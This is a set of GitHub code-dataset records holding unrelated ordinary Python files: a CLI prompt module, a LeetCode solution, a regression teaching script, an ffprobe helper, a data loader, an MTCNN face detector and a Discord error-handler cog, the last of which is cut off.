}\n )\n\n if help:\n\n def bottom_toolbar():\n return [(\"class:\", help)]\n\n else:\n bottom_toolbar = None\n\n colored_message = [\n (\"class:message\", message),\n (\"class:\", \": \"),\n ]\n\n return prompt_toolkit.prompt(\n colored_message,\n bottom_toolbar=bottom_toolbar,\n style=style,\n default=prefill,\n completer=autocomplete_,\n complete_while_typing=True,\n is_password=is_password,\n )\n\n else:\n while True:\n value = input(\n colorize(m18n.g(\"edit_text_question\", message), color)\n )\n value = value.lower().strip()\n if value in [\"\", \"n\", \"no\"]:\n return prefill\n elif value in [\"y\", \"yes\"]:\n break\n\n initial_message = prefill.encode(\"utf-8\")\n\n with tempfile.NamedTemporaryFile(suffix=\".tmp\") as tf:\n tf.write(initial_message)\n tf.flush()\n call([\"editor\", tf.name])\n tf.seek(0)\n edited_message = tf.read()\n return edited_message.decode(\"utf-8\")\n\n value = _prompt(message)\n\n if confirm:\n m = message[0].lower() + message[1:]\n if _prompt(m18n.g(\"confirm\", prompt=m)) != value:\n raise MoulinetteValidationError(\"values_mismatch\")\n\n return value\n\n def display(self, message, style=\"info\"): # i18n: info\n \"\"\"Display a message\"\"\"\n if style == \"success\":\n print(\"{} {}\".format(colorize(m18n.g(\"success\"), \"green\"), message))\n elif style == \"warning\":\n 
print(\"{} {}\".format(colorize(m18n.g(\"warning\"), \"yellow\"), message))\n elif style == \"error\":\n print(\"{} {}\".format(colorize(m18n.g(\"error\"), \"red\"), message))\n else:\n print(message)\n","repo_name":"YunoHost/moulinette","sub_path":"moulinette/interfaces/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":19962,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"63"} +{"seq_id":"13555245202","text":"\"\"\"\n给定一个非空字符串 s 和一个包含非空单词列表的字典 wordDict,判定 s 是否可以被空格拆分为一个或多个在字典中出现的单词。\n\n说明:\n\n拆分时可以重复使用字典中的单词。\n你可以假设字典中没有重复的单词。\n示例 1:\n\n输入: s = \"leetcode\", wordDict = [\"leet\", \"code\"]\n输出: true\n解释: 返回 true 因为 \"leetcode\" 可以被拆分成 \"leet code\"。\n示例 2:\n\n输入: s = \"applepenapple\", wordDict = [\"apple\", \"pen\"]\n输出: true\n解释: 返回 true 因为 \"applepenapple\" 可以被拆分成 \"apple pen apple\"。\n  注意你可以重复使用字典中的单词。\n示例 3:\n\n输入: s = \"catsandog\", wordDict = [\"cats\", \"dog\", \"sand\", \"and\", \"cat\"]\n输出: false\n\"\"\"\nfrom typing import List\n\n\ndef wordBreak(s: str, wordDict: List[str]) -> bool:\n dp = [False] * (len(s) + 1)\n dp[0] = True\n for i in range(len(s) + 1):\n for j in range(i):\n if s[j:i] in wordDict and dp[j] == True:\n dp[i] = True\n break\n\n return dp[-1]\n\n# def wordBreak(s: str, wordDict: List[str]) -> bool:\n# for i in range(len(s) + 1):\n# if s[0:i] in wordDict and (wordBreak(s[i:len(s) + 1], wordDict) or i == len(s)):\n# return True\n# return False\n\ns = \"catsandog\"\nwordDict = [\"cats\", \"dog\", \"sand\", \"and\", \"cat\"]\nprint(wordBreak(s, wordDict))","repo_name":"xiaodonggua1/leetcode","sub_path":"单词拆分-中等.py","file_name":"单词拆分-中等.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"19275118716","text":"# # Problems with the Predictors\n# ## Errors in the Predictors\n#\t\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy as sp\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport faraway.utils\n\n\n#\t\n\nimport faraway.datasets.cars\ncars = faraway.datasets.cars.load()\nest = np.polyfit(cars.speed, cars.dist, 1)\nest.round(2)\n\n\n#\t\n\nfig, ax = plt.subplots()\nax.scatter(cars.speed, cars.dist,label=None)\nplt.xlabel(\"Speed\")\nplt.ylabel(\"Distance\")\nxr = np.array(ax.get_xlim())\nnp.random.seed(123)\nax.plot(xr, est[1] + est[0] * xr,label=\"0\")\nest1 = np.polyfit(cars.speed + np.random.normal(size=50), \n cars.dist, 1)\nax.plot(xr, est1[1] + est1[0] * xr, 'k--',label=\"1\")\nest2 = np.polyfit(cars.speed + np.random.normal(scale=2,size=50), \n cars.dist, 1)\nax.plot(xr, est2[1] + est2[0] * xr, 'k-.',label=\"2\")\nest5 = np.polyfit(cars.speed + np.random.normal(scale=5,size=50), \n cars.dist, 1)\nax.plot(xr, est5[1] + est5[0] * xr, 'k:',label=\"5\")\nplt.legend(title='$\\delta$')\n\n\n#\t\n\nee = pd.DataFrame.from_records([est, est1, est2, est5],\n columns=[\"slope\",\"intercept\"])\nee.insert(0,\"SDdelta\",[0,1,2,5])\nprint(ee.round(2).to_string(index=False))\n\n\n#\t\n\nvv = np.repeat(np.array([0.1, 0.2, 0.3, 0.4, 0.5]), \n [1000, 1000, 1000, 1000, 1000])\nslopes = np.zeros(5000)\nfor i in range(5000):\n slopes[i] = np.polyfit(cars.speed+np.random.normal(\n scale=np.sqrt(vv[i]),size=50), cars.dist, 1)[0]\n\n\n#\t\n\nbetas = np.reshape(slopes, (5, 1000)).mean(axis=1)\nbetas = np.append(betas,est[0])\nvariances = np.array([0.6, 0.7, 0.8, 0.9, 1.0, 0.5])\ngv = np.polyfit(variances, betas,1)\n\n\n#\t\n\nplt.scatter(variances, 
betas)\nxr = np.array([0,1])\nplt.plot(xr, np.array(gv[1] + gv[0]*xr))\nplt.plot([0], [gv[1]], marker='x', markersize=6)\n\n\n#\t\n\ngv.round(2)\n\n\n# ## Changes of Scale\n#\t\n\nimport faraway.datasets.savings\nsavings = faraway.datasets.savings.load()\nlmod = smf.ols('sr ~ pop15 + pop75 + dpi + ddpi', savings).fit()\nlmod.sumary()\n\n\n#\t\n\nlmod = smf.ols('sr ~ pop15 + pop75 + I(dpi/1000) + ddpi', \n savings).fit()\nlmod.sumary()\n\n\n#\t\n\nscsav = savings.apply(sp.stats.zscore)\nlmod = smf.ols('sr ~ pop15 + pop75 + dpi + ddpi', scsav).fit()\nlmod.sumary()\n\n\n#\t\n\nedf = pd.concat([lmod.params, lmod.conf_int()],axis=1).iloc[1:,]\nedf.columns = ['estimate','lb','ub']\nnpreds = edf.shape[0]\nfig, ax = plt.subplots()\nax.scatter(edf.estimate,np.arange(npreds))\nfor i in range(npreds):\n ax.plot([edf.lb[i], edf.ub[i]], [i, i])\nax.set_yticks(np.arange(npreds))\nax.set_yticklabels(edf.index)\nax.axvline(0)\n\n\n#\t\n\nsavings['age'] = np.where(savings.pop15 > 35, 0, 1)\n\n\n#\t\n\nsavings['dpis'] = sp.stats.zscore(savings.dpi)/2\nsavings['ddpis'] = sp.stats.zscore(savings.ddpi)/2\nsmf.ols('sr ~ age + dpis + ddpis', savings).fit().sumary()\n\n\n# ## Collinearity\n#\t\n\nimport faraway.datasets.seatpos\nseatpos = faraway.datasets.seatpos.load()\nlmod = smf.ols(\n 'hipcenter ~ Age+Weight+HtShoes+Ht+Seated+Arm+Thigh+Leg', \n seatpos).fit()\nlmod.sumary()\n\n\n#\t\n\nseatpos.iloc[:,:-1].corr().round(3)\n\n\n#\t\n\nX = lmod.model.wexog[:,1:]\nXTX = X.T @ X\nevals, evecs = np.linalg.eig(XTX)\nevals = np.flip(np.sort(evals))\nevals\n\n\n#\t\n\nnp.sqrt(evals[0]/evals[1:])\n\n\n#\t\n\nfrom patsy import dmatrix\nX = dmatrix(\"Age+Weight+HtShoes+Ht+Seated+Arm+Thigh+Leg\", \n seatpos, return_type='dataframe')\nlmod = sm.OLS(X['Age'],X.drop('Age',axis=1)).fit()\nlmod.rsquared, 1/(1-lmod.rsquared)\n\n\n#\t\n\nfrom statsmodels.stats.outliers_influence \\\n import variance_inflation_factor\nvif = [variance_inflation_factor(X.values, i) \\\n for i in range(X.shape[1])]\npd.Series(vif, X.columns)\n\n\n#\t\n\nseatpos['hiperb'] = seatpos.hipcenter+ \\\n np.random.normal(scale=10,size=38)\nlmod = smf.ols(\n 'hipcenter ~ Age+Weight+HtShoes+Ht+Seated+Arm+Thigh+Leg', \n seatpos).fit()\nlmodp = smf.ols(\n 'hiperb ~ Age+Weight+HtShoes+Ht+Seated+Arm+Thigh+Leg', \n seatpos).fit()\npd.DataFrame([lmod.params, lmodp.params],\n index=['original','perturbed']).round(3)\n\n\n#\t\n\nlmod.rsquared, lmodp.rsquared\n\n\n#\t\n\npd.DataFrame.corr(X.iloc[3:,3:]).round(3)\n\n\n#\t\n\nsmf.ols('hipcenter ~ Age+Weight+Ht', seatpos).fit().sumary()\n\n\n# ## Exercises\n\n# ## Packages Used\n\nimport sys\nimport matplotlib\nimport statsmodels as sm\nimport seaborn as sns\nprint(\"Python version:{}\".format(sys.version))\nprint(\"matplotlib version: {}\".format(matplotlib.__version__))\nprint(\"pandas version: {}\".format(pd.__version__))\nprint(\"numpy version: {}\".format(np.__version__))\nprint(\"statsmodels version: {}\".format(sm.__version__))\nprint(\"seaborn version: {}\".format(sns.__version__))\n\n ","repo_name":"julianfaraway/LMP","sub_path":"pyscripts/errvar.py","file_name":"errvar.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"63"} +{"seq_id":"14377441013","text":"#!/bin/python\nimport sys,os,os.path\nimport subprocess\nimport json\nimport re\nimport datetime\n\ng_dtm_format=re.compile(r'(\\d{4})-(\\d{2})-(\\d{2})\\D+(\\d{2}):(\\d{2}):(\\d{2})')\ng_w_h_format=re.compile(r'width=(\\d+)\\D+height=(\\d+)')\n\ndef 
ffprobe_get_width_height(full_path):\n if not os.path.exists(full_path):\n return False,0,0\n cmd = 'ffprobe \"%s\"'%full_path\n #print(cmd)\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n out_str = p.communicate('')\n #print('out_str:', out_str)\n arr=g_w_h_format.split(out_str[0].decode('utf-8'))\n if len(arr)>=3:\n return True,int(arr[1]),int(arr[2])\n return False,0,0\n\ndef ffprobe_get_json(full_path):\n if not os.path.exists(full_path):\n return False,None\n cmd = 'ffprobe -v error -show_format \"%s\" -of json | sed \"2,5d\"'%full_path\n #print(cmd)\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n #print('out_str:', out_str)\n out_str = p.communicate('')\n #print('out_str:', out_str)\n try:\n j = json.loads(out_str[0])\n except:\n return False,None\n return True,j\n\ndef ffprobe_get_create_date_duration(full_path):\n ret,j = ffprobe_get_json(full_path)\n if not ret:\n return False,None,0.0\n if 'format' not in j:\n return False,None,0.0\n fmt = j['format']\n duration = float(fmt.get('duration', '0.0'))\n if 'tags' not in fmt:\n return True,None,duration\n tags = fmt['tags']\n if 'date' in tags:\n arr = g_dtm_format.split(tags['date'])\n if len(arr)<7:\n return True,None,duration\n dtm = datetime.datetime.fromisoformat('%s-%s-%s %s:%s:%s'%\\\n (arr[1], arr[2], arr[3], arr[4], arr[5], arr[6]))\n return True, dtm, duration \n if 'creation_time' not in tags:\n return True,None,duration\n arr = g_dtm_format.split(tags['creation_time'])\n if len(arr)<7:\n return True,None,duration\n dtm = datetime.datetime.fromisoformat('%s-%s-%s %s:%s:%s'%\\\n (arr[1], arr[2], arr[3], arr[4], arr[5], arr[6]))\n return True, dtm, duration\n\nif __name__=='__main__':\n argc = len(sys.argv)\n if argc<2:\n print('usage:%s '%sys.argv[0])\n sys.exit()\n ret,j = ffprobe_get_json(sys.argv[1])\n if not ret:\n print('fail')\n sys.exit()\n #print(j)\n print('json:',j)\n print('create date and duration:', ffprobe_get_create_date_duration(sys.argv[1]))\n #\n print('width and height:', ffprobe_get_width_height(sys.argv[1]))\n\n#python ffprobe_tools.py /mnt/public/微云网盘/12304685/家庭视频/2015年09月/IMG_0530.MOV\n# ","repo_name":"ahfuzhang/tnas_video_web","sub_path":"python/public_lib/ffprobe_tools.py","file_name":"ffprobe_tools.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"20379721491","text":"\n\nimport csv\nimport os\nimport random\nimport sys\nfrom bpfe.clean import clean_value\nfrom bpfe.config import INPUT_MAPPING, LABEL_MAPPING, Settings, ChunkSettings\nfrom bpfe.entities import Data, Label\nfrom bpfe.feature_engineering import get_vectorizers\nfrom bpfe.reservoir import reservoir\nimport math\nfrom bpfe.text_transform import transform\n\n\n# noinspection PyBroadException\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\n\ndef generate_submission_rows(seed=1, amt=None):\n if amt is None:\n amt = sys.maxint\n ret = []\n for data, _ in generate_rows('data/TestData.csv', seed, amt):\n ret.append((data, None))\n return ret\n\n\ndef generate_training_rows(seed=1, amt=None):\n if amt is None:\n amt = sys.maxint\n ret = []\n for data, label in generate_rows('data/TrainingData.csv', seed, amt):\n ret.append((data, label))\n random.seed(seed)\n random.shuffle(ret)\n return ret\n\n\ndef generate_rows(file_path, seed, amt):\n with open(file_path) as infile:\n reader = csv.reader(infile)\n header = next(reader)\n input_index_map = dict()\n label_index_map = dict()\n for idx, col 
in enumerate(header):\n if col == '':\n continue\n\n if col in INPUT_MAPPING:\n input_index_map[col] = idx\n else:\n label_index_map[col] = idx\n\n for line in reservoir(reader, seed, amt):\n d = Data()\n d.id = line[0]\n l = Label()\n for key, idx in input_index_map.iteritems():\n setattr(d, INPUT_MAPPING[key], clean_value(line[idx]))\n for key, idx in label_index_map.iteritems():\n setattr(l, LABEL_MAPPING[key], line[idx])\n\n yield d, l\n\n\ndef split_test_train(data):\n validate_data = data[:40000]\n data = data[40000:]\n test_data = data[:50000]\n train_data = data[50000:]\n return validate_data, test_data, train_data\n\n\ndef store_raw(seed=1, verbose=False):\n random_data = generate_training_rows(seed)\n validate, test, train = split_test_train(random_data)\n submission = generate_submission_rows(seed)\n chunk_size = 5000\n if verbose:\n print('{}, {}, {}, {}'.format(\n len(train),\n len(validate),\n len(test),\n len(submission)\n ))\n\n def store_in_chunks(data, name):\n # add changes to data here, then regen\n for row, label in data:\n for attr in Data.text_attributes:\n value = getattr(row, attr)\n\n _, cleaned = transform(value)\n row.cleaned[attr + '-mapped'] = cleaned\n\n with open('data/data-{}.pkl'.format(name), 'wb') as datafile:\n chunks = len(data) / float(chunk_size)\n chunks = int(math.ceil(chunks))\n pickle.dump(\n chunks,\n datafile,\n protocol=pickle.HIGHEST_PROTOCOL\n )\n # noinspection PyArgumentList\n for i in xrange(0, len(data), chunk_size):\n pickle.dump(\n data[i: i + chunk_size],\n datafile,\n protocol=pickle.HIGHEST_PROTOCOL\n )\n\n store_in_chunks(validate, 'validate')\n store_in_chunks(test, 'test')\n store_in_chunks(submission, 'submission')\n store_in_chunks(train, 'train')\n\n\ndef gen_validate(settings, batch_size=None):\n for data in _gen_name('validate', settings.chunks.validate, batch_size):\n yield data\n\n\ndef gen_test(settings, batch_size=None):\n for data in _gen_name('test', settings.chunks.test, batch_size):\n yield data\n\n\ndef gen_train(settings, batch_size=None):\n for data in _gen_name('train', settings.chunks._train, batch_size):\n yield data\n\n\ndef gen_submission(settings, batch_size=None):\n for data in _gen_name('submission', settings.chunks.submission, batch_size):\n yield data\n\n\ndef _gen_name(name, num_chunks, batch_size=None):\n if batch_size is None:\n batch_size = sys.maxint\n\n with open('data/data-{}.pkl'.format(name), 'rb') as datafile:\n chunks = pickle.load(datafile)\n data = []\n for i in range(chunks):\n if i >= num_chunks:\n break\n\n data += pickle.load(datafile)\n total_size = len(data)\n\n if batch_size > total_size:\n continue\n\n batches = int(math.ceil(total_size / float(batch_size)))\n if batches > 1:\n for j in range(batches):\n sub_data = data[int(j*batch_size): int((j+1)*batch_size)]\n yield sub_data\n else:\n yield data\n\n data = []\n\n if len(data) > 0:\n yield data\n\n\ndef ugen_all(unique=True):\n for data in ugen_validate(unique):\n yield data\n for data in ugen_test(unique):\n yield data\n for data in ugen_train(unique):\n yield data\n for data in ugen_submission(unique):\n yield data\n\n\ndef ugen_validate(unique=True):\n for data in _ugen_name('validate'):\n yield data\n\n\ndef ugen_test(unique=True):\n for data in _ugen_name('test'):\n yield data\n\n\ndef ugen_train(unique=True):\n for data in _ugen_name('train'):\n yield data\n\n\ndef ugen_submission(unique=True):\n for data in _ugen_name('submission', unique):\n yield data\n\n\ndef _ugen_name(name, unique=True):\n if unique:\n fname = 
'data/unique-{}.pkl'.format(name)\n else:\n fname = 'data/{}.pkl'.format(name)\n with open(fname, 'rb') as datafile:\n data = pickle.load(datafile)\n for row in data:\n yield row\n\n\ndef load_vectorizers(settings):\n print('loading vectorizers')\n fname = 'data/vectorizers-{}.pkl'.format(\n settings.chunks\n )\n if os.path.exists(fname):\n with open(fname, 'rb') as ifile:\n v = pickle.load(ifile)\n else:\n print('creating vectorizers for {} chunks'.format(settings.chunks))\n v = get_vectorizers(settings)\n with open(fname, 'wb') as ifile:\n pickle.dump(v, ifile, protocol=pickle.HIGHEST_PROTOCOL)\n\n return v\n","repo_name":"JesseBuesking/dd-bpfe","sub_path":"bpfe/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":6188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"23486983443","text":"\"\"\" We suppose that the input file is a classic *.txt with a list of lists.\r\n Representation of the list: File equivalence:\r\n [[1,2], [2,3], [5,6], [5]] --> | 1,2\r\n | 2,3\r\n | 5,6\r\n | 5\r\n\r\n [[1,2], [2,3,4], [1]] --> | 1,2\r\n | 2,3,4\r\n | 1\r\n\r\n NOTE: we also suppose that there is only one super set in the list.\r\n\"\"\"\r\n\r\n\r\ndef remove_superset():\r\n super_index = -1 # index of the super set (-1 is just a placeholder)\r\n\r\n with open(\"su_list1.txt\", \"r\") as file:\r\n # Here I convert each sublist into a set for easier comparison later on\r\n big_list = [set([int(val) for val in line.split(',')])\r\n for line in file]\r\n\r\n # I print the list of sets to check that everything is fine\r\n print(f\"List of sets: {big_list}\")\r\n\r\n # Here I loop to cross-check each set with the others\r\n for i in range(len(big_list)):\r\n for j in range(i+1, len(big_list)):\r\n # I check for superset\r\n if (big_list[i] > big_list[j]):\r\n super_index = i\r\n break # I break the loop if I find a super set\r\n\r\n if super_index != -1:\r\n print(f\"Superset index is {super_index} (starts from 0).\")\r\n del big_list[super_index]\r\n # Here I convert the set back to a sublist\r\n big_list = [list(single_set) for single_set in big_list]\r\n # I print the new list of lists\r\n print(f\"New list of lists is: {big_list} .\")\r\n else:\r\n print(\"Nothing here buds...\") # Pepesad\r\n\r\n\r\nif __name__ == \"__main__\":\r\n remove_superset()\r\n","repo_name":"Cipulot/Various","sub_path":"superset.py","file_name":"superset.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"18213324612","text":"import tool\nimport nets\nimport torch\nimport numpy as np\nfrom torchvision import transforms\nimport time\nfrom PIL import Image, ImageDraw\nimport cv2\nimport os\nfrom torchvision.ops.boxes import batched_nms, nms\n\n\"\"\"\nSince P-net detection takes a long time, the for loop that extracts boxes during P-net detection is replaced with array slicing\n\"\"\"\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else 'cpu')\n\n\nclass Detector:\n def __init__(self, pnet_path, rnet_path, onet_path, softnms=False, thresholds=None, factor=0.709):\n if thresholds is None:\n thresholds = [0.6, 0.6, 0.95]\n self.thresholds = thresholds\n self.factor = factor\n self.softnms = softnms\n\n self.pnet = nets.PNet().to(device)\n self.rnet = nets.RNet().to(device)\n self.onet = nets.ONet().to(device)\n self.pnet.load_state_dict(torch.load(pnet_path))\n self.rnet.load_state_dict(torch.load(rnet_path))\n self.onet.load_state_dict(torch.load(onet_path))\n\n self.pnet.eval()\n self.rnet.eval()\n self.onet.eval()\n\n 
self.img_transfrom = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])\n ])\n\n def detect(self, image):\n start_time = time.time()\n pnet_boxes = self.pnet_detect(image)\n if pnet_boxes.shape[0] == 0:\n print(\"P-net did not detect any face\")\n return np.array([])\n end_time = time.time()\n pnet_time = end_time - start_time\n\n start_time = time.time()\n rnet_boxes = self.rnet_detect(image, pnet_boxes)\n if rnet_boxes.shape[0] == 0:\n print(\"R-net did not detect any face\")\n return np.array([])\n end_time = time.time()\n rnet_time = end_time - start_time\n\n start_time = time.time()\n onet_boxes = self.onet_detect(image, rnet_boxes)\n if onet_boxes.shape[0] == 0:\n print(\"O-net did not detect any face\")\n return np.array([])\n end_time = time.time()\n onet_time = end_time - start_time\n\n sum_time = pnet_time + rnet_time + onet_time\n print(\"time:{}, pnet_time:{}, rnet_time:{}, onet_time:{}\".format(sum_time, pnet_time, rnet_time, onet_time))\n return pnet_boxes, rnet_boxes, onet_boxes\n\n def pnet_detect(self, image):\n boxes = []\n w, h = image.size\n min_side = min(w, h)\n scale = 1\n\n # remove the first image\n # scale = 0.7\n # image = image.resize((int(w*scale), int(h*scale)))\n while min_side > 12:\n img_data = self.img_transfrom(image).to(device)\n img_data.unsqueeze_(0)\n _cls, _offset = self.pnet(img_data)\n _cls = _cls[0][0].data.cpu()\n _offset = _offset[0].data.cpu()\n\n # (n,2)\n indexes = torch.nonzero(_cls > self.thresholds[0])\n # improvement over the for loop\n # for index in indexes:\n # boxes.append(self.box(index, _cls[index[0], index[1]], _offset, scale))\n boxes.extend(self.box(indexes, _cls, _offset, scale))\n\n scale *= self.factor\n _w = int(w * scale)\n _h = int(h * scale)\n image = image.resize((_w, _h))\n min_side = min(_w, _h)\n\n if self.softnms:\n return tool.soft_nms(torch.stack(boxes).numpy(), 0.3)\n # return tool.nms(torch.stack(boxes).numpy(), 0.3)\n boxes = torch.stack(boxes)\n return boxes[nms(boxes[:, :4], boxes[:, 4], 0.3)].numpy()\n\n def box(self, indexes, cls, offset, scale, stride=2, side_len=12):\n # (n,)\n _x1 = (indexes[:, 1] * stride) / scale\n _y1 = (indexes[:, 0] * stride) / scale\n _x2 = (indexes[:, 1] * stride + side_len) / scale\n _y2 = (indexes[:, 0] * stride + side_len) / scale\n side = _x2 - _x1\n # (4, n)\n offset = offset[:, indexes[:, 0], indexes[:, 1]]\n # (n,)\n x1 = (_x1 + side * offset[0])\n y1 = (_y1 + side * offset[1])\n x2 = (_x2 + side * offset[2])\n y2 = (_y2 + side * offset[3])\n # (n,)\n cls = cls[indexes[:, 0], indexes[:, 1]]\n # (n, 5)\n return torch.stack([x1, y1, x2, y2, cls], dim=1)\n\n def rnet_detect(self, image, pnet_boxes):\n boxes = []\n img_dataset = []\n # take the squared boxes and convert them to a tensor, so tensor indexing can be used later\n square_boxes = torch.from_numpy(tool.convert_to_square(pnet_boxes))\n for box in square_boxes:\n _x1 = int(box[0])\n _y1 = int(box[1])\n _x2 = int(box[2])\n _y2 = int(box[3])\n # coordinates outside the original image are automatically padded with black during crop\n img_crop = image.crop([_x1, _y1, _x2, _y2])\n img_crop = img_crop.resize((24, 24))\n img_data = self.img_transfrom(img_crop).to(device)\n img_dataset.append(img_data)\n # (n,1) (n,4)\n _cls, _offset = self.rnet(torch.stack(img_dataset))\n\n _cls = _cls.data.cpu()\n _offset = _offset.data.cpu()\n # (14,)\n indexes = torch.nonzero(_cls > self.thresholds[1])[:, 0]\n\n # (n,5)\n box = square_boxes[indexes]\n # (n,)\n _x1 = box[:, 0]\n _y1 = box[:, 1]\n _x2 = box[:, 2]\n _y2 = box[:, 3]\n side = _x2 - _x1\n # (n,4)\n offset = _offset[indexes]\n # (n,)\n x1 = _x1 + side * offset[:, 0]\n y1 = _y1 + side * offset[:, 1]\n x2 = _x2 + side * offset[:, 2]\n y2 = 
_y2 + side * offset[:, 3]\n # (n,)\n cls = _cls[indexes][:, 0]\n # np.array([x1, y1, x2, y2, cls]) (5,n)\n boxes.extend(torch.stack([x1, y1, x2, y2, cls], dim=1))\n if len(boxes) == 0:\n return np.array([])\n\n boxes = torch.stack(boxes)\n return boxes[nms(boxes[:, :4], boxes[:, 4], 0.3)].numpy()\n\n def onet_detect(self, image, rnet_boxes):\n boxes = []\n img_dataset = []\n square_boxes = tool.convert_to_square(rnet_boxes)\n for box in square_boxes:\n _x1 = int(box[0])\n _y1 = int(box[1])\n _x2 = int(box[2])\n _y2 = int(box[3])\n img_crop = image.crop([_x1, _y1, _x2, _y2])\n img_crop = img_crop.resize((48, 48))\n img_data = self.img_transfrom(img_crop).to(device)\n img_dataset.append(img_data)\n\n _cls, _offset, _point = self.onet(torch.stack(img_dataset))\n _cls = _cls.data.cpu().numpy()\n _offset = _offset.data.cpu().numpy()\n _point = _point.data.cpu().numpy()\n indexes, _ = np.where(_cls > self.thresholds[2])\n # (n,5)\n box = square_boxes[indexes]\n # (n,)\n _x1 = box[:, 0]\n _y1 = box[:, 1]\n _x2 = box[:, 2]\n _y2 = box[:, 3]\n side = _x2 - _x1\n # (n,4)\n offset = _offset[indexes]\n # (n,)\n x1 = _x1 + side * offset[:, 0]\n y1 = _y1 + side * offset[:, 1]\n x2 = _x2 + side * offset[:, 2]\n y2 = _y2 + side * offset[:, 3]\n # (n,)\n cls = _cls[indexes][:, 0]\n # (n,10)\n point = _point[indexes]\n px1 = _x1 + side * point[:, 0]\n py1 = _y1 + side * point[:, 1]\n px2 = _x1 + side * point[:, 2]\n py2 = _y1 + side * point[:, 3]\n px3 = _x1 + side * point[:, 4]\n py3 = _y1 + side * point[:, 5]\n px4 = _x1 + side * point[:, 6]\n py4 = _y1 + side * point[:, 7]\n px5 = _x1 + side * point[:, 8]\n py5 = _y1 + side * point[:, 9]\n # np.array([x1, y1, x2, y2, cls, px1, py1, px2, py2, px3, py3, px4, py4, px5, py5]) (15,n)\n boxes.extend(np.stack([x1, y1, x2, y2, cls, px1, py1, px2, py2, px3, py3, px4, py4, px5, py5], axis=1))\n\n if len(boxes) == 0:\n return np.array([])\n return tool.nms(np.stack(boxes), 0.3, isMin=True)\n\n\nif __name__ == '__main__':\n img_path = r\"./data/detect_img/06.jpg\"\n img = Image.open(img_path)\n detector = Detector(\"param/p_net.pth\", \"param/r_net.pth\", \"param/o_net.pth\")\n pnet_boxes, rnet_boxes, onet_boxes = detector.detect(img)\n img = cv2.imread(img_path)\n for box in onet_boxes:\n x1 = int(box[0])\n y1 = int(box[1])\n x2 = int(box[2])\n y2 = int(box[3])\n cv2.rectangle(img, (x1, y1), (x2, y2), color=(0, 0, 255), thickness=3)\n for i in range(5, 15, 2):\n cv2.circle(img, (int(box[i]), int(box[i + 1])), radius=2, color=(255, 255, 0), thickness=-1)\n # cv2.imshow(\"img\", img)\n cv2.waitKey(0)\n","repo_name":"jiangtao129/MTCNN","sub_path":"fast_detect.py","file_name":"fast_detect.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"10164333512","text":"import discord\r\nimport traceback\r\nimport sys\r\nfrom discord.ext import commands\r\nimport datetime\r\n\r\n\r\nclass Errors(commands.Cog):\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.show = False\r\n\r\n @commands.Cog.listener()\r\n async def on_command_error(self, ctx, error):\r\n \"\"\"The event triggered when an error is raised while invoking a command.\r\n Parameters\r\n ------------\r\n ctx: commands.Context\r\n The context used for command invocation.\r\n error: commands.CommandError\r\n The Exception raised.\r\n \"\"\"\r\n if hasattr(ctx.command, 'on_error'):\r\n return\r\n\r\n cog = ctx.cog\r\n if cog:\r\n if cog._get_overridden_method(cog.cog_command_error) is not None:\r\n 
return\r\n\r\n error = getattr(error, 'original', error)\r\n\r\n if isinstance(error, commands.CommandOnCooldown):\r\n em = discord.Embed(\r\n title=\"Command is on Cooldown\",\r\n description='This command is on a %.2f cooldown' % error.retry_after,\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em)\r\n elif isinstance(error, commands.MissingPermissions):\r\n em1 = discord.Embed(\r\n title=\"Missing Perms\",\r\n description=\"Oops, it seems like you want to do something you don't have permission to!\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em1)\r\n elif isinstance(error, commands.BotMissingPermissions):\r\n em3 = discord.Embed(\r\n title=\"I don't have permission\",\r\n description=\"You can't tell me to do what I can't!\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em3)\r\n elif isinstance(error, commands.ChannelNotFound):\r\n em4 = discord.Embed(\r\n title=\"Channel Not Found\",\r\n description=\"I can't seem to find the channel you specified. Please try again\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em4)\r\n elif isinstance(error, commands.ConversionError):\r\n em5 = discord.Embed(\r\n title=\"Small Bug\",\r\n description=\"235baron seems to have made a mistake in my code (warn him about it, it's uncomfortable to have bugs inside me)\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em5)\r\n elif isinstance(error, commands.EmojiNotFound):\r\n em6 = discord.Embed(\r\n title=\"Emoji Not Found\",\r\n description=\"Either you told me to send an emoji which doesn't exist or 235baron made a mistake when creating an emoji.\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em6)\r\n elif isinstance(error, commands.MemberNotFound):\r\n em7 = discord.Embed(\r\n title=\"Member Not Found\",\r\n description=\"Couldn't seem to find the member you specified (check the spelling of the name)\",\r\n 